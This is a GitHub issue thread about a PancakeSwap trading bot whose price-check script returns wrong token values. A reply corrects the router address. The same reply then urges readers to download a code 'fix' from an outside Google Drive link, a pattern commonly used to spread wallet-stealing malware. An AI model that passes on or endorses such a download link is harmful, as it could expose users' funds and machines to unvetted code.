### ISSUE TITLE
check_price.py bad value return?

### ISSUE THREAD

**Issue by REDNicotine** [manuelhb14/cake_uni_transaction_bot#2]
When i try with DOGE token (0xbA2aE424d960c26247Dd6c32edC70B295c744C43) for example, the script return a no logical value. exemple:

returned value : 
`14911817256283214372459 `

Real data:

```
1 DOGE = 0.0005659007510318307323176098101 BNB
1 DOGE = 0.2732584927106925421905399073 BUSD
```

when i try with ALPACA token it may work:

returned value: 
`1259088584327102986 (considering the 1**18 it's ok) (1,2590)`

Real data:
```
1 ALPACA = 0.002586909487295506251213210842 BNB
1 ALPACA = 1.249013559471769018175194678 BUSD
```

I tried with the pancakeswap router v2 contract:

```
        else:
            router_address = Web3.toChecksumAddress("0x05fF2B0DB69458A0750badebc4f9e13aDd608C7F") # mainnet router
            with open("./abis/pancakeRouter.json") as f:
```

Maybe a problem with unit or low value token?

**Comment by Kocarus** [comment]
You're using the PancakeSwap: Router v1, try with v2, this should be the correct one:

```
else:
            router_address = Web3.toChecksumAddress("0x10ed43c718714eb63d5aa57b78b54704e256024e") # PancakeSwap: Router v2
            with open("./abis/pancakeRouter.json") as f:
```

However, there were errors in functions so I updated the code to make it work.
You can download the fix here: https://drive.google.com/file/d/1Z449PPU8VvW0Joyhu9-gvZerrbEVK-Eu/view?usp=sharing
See "README.TXT" for instructions 🚀
